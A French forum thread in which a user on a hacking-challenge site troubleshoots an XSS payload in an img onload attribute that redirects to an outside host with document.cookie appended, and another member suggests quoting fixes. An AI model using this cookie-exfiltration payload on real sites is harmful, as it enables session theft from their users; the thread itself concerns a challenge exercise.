Probléme concaténation

Signaler
Messages postés
52
Date d'inscription
jeudi 23 avril 2009
Statut
Membre
Dernière intervention
7 décembre 2011
-
Messages postés
52
Date d'inscription
jeudi 23 avril 2009
Statut
Membre
Dernière intervention
7 décembre 2011
-
bonjour,

Je suis inscrit a un site de challenge et je dois faire une redirection vers un site en ajoutant les cookies dans l'adresse via une faille xss.

j'ai donc fait comme sa

onload=javascript:document.location=%27http://site.fr/index.php?cookie=%27%20%2B%20document.cookie;

Cela me redirige bien vers le site mais cela ne m'affiche pas les cookie après cookie= et si je les affiches dans une alert tous marche bien.

quelqu'un pourrait il me dire d'où viens le problème?

Merci d'avance

jérémy

6 réponses

Messages postés
110
Date d'inscription
dimanche 23 janvier 2005
Statut
Membre
Dernière intervention
2 avril 2010

Je ne suis pas sur mais :


onload="javascript:document.location='%27http://site.fr/index.php?cookie=%27%20%2B%20'+document.cookie";
Messages postés
52
Date d'inscription
jeudi 23 avril 2009
Statut
Membre
Dernière intervention
7 décembre 2011

c'est exactement ce que je fait.

%27 = '
%20 = espace
%2B = +

cela correspondant a sa une fois que la page est générer.

onload=javascript:document.location='http://site.fr/index.php?cookie=' + document.cookie;

jérémy
Messages postés
110
Date d'inscription
dimanche 23 janvier 2005
Statut
Membre
Dernière intervention
2 avril 2010

Et tu ne met pas de " ?

onload="javascript:document.location='http://site.fr/index.php?cookie=' + document.cookie"
Messages postés
52
Date d'inscription
jeudi 23 avril 2009
Statut
Membre
Dernière intervention
7 décembre 2011

j'ai essayer avec cela ne marche quand même pas.

J'ai oublier de préciser cela a peut être un intérer ce code se trouve dans dans une balise img.

et en exploitant la faille XSS cela donne quelque chose d'assez moche qui peut provoquer des erreur html mais je pense pas de JS.

je vous met le tous:


[xxxx.php ]



Cela fait 5 heure que je cherche a régler ce problème je commence a désespérer

jérémy
Messages postés
110
Date d'inscription
dimanche 23 janvier 2005
Statut
Membre
Dernière intervention
2 avril 2010

[xxxx.php ]


Ya un .jpg en trop ainsi que le ;
Messages postés
52
Date d'inscription
jeudi 23 avril 2009
Statut
Membre
Dernière intervention
7 décembre 2011

je suis désoler j'ai comprit le problème... les cookie avait disparu donc cela n'afficher rien.


je suis désoler de t'avoir fait perdre ton temps croftman et je te remercie d'avoir essayer de m'aider.


jérémy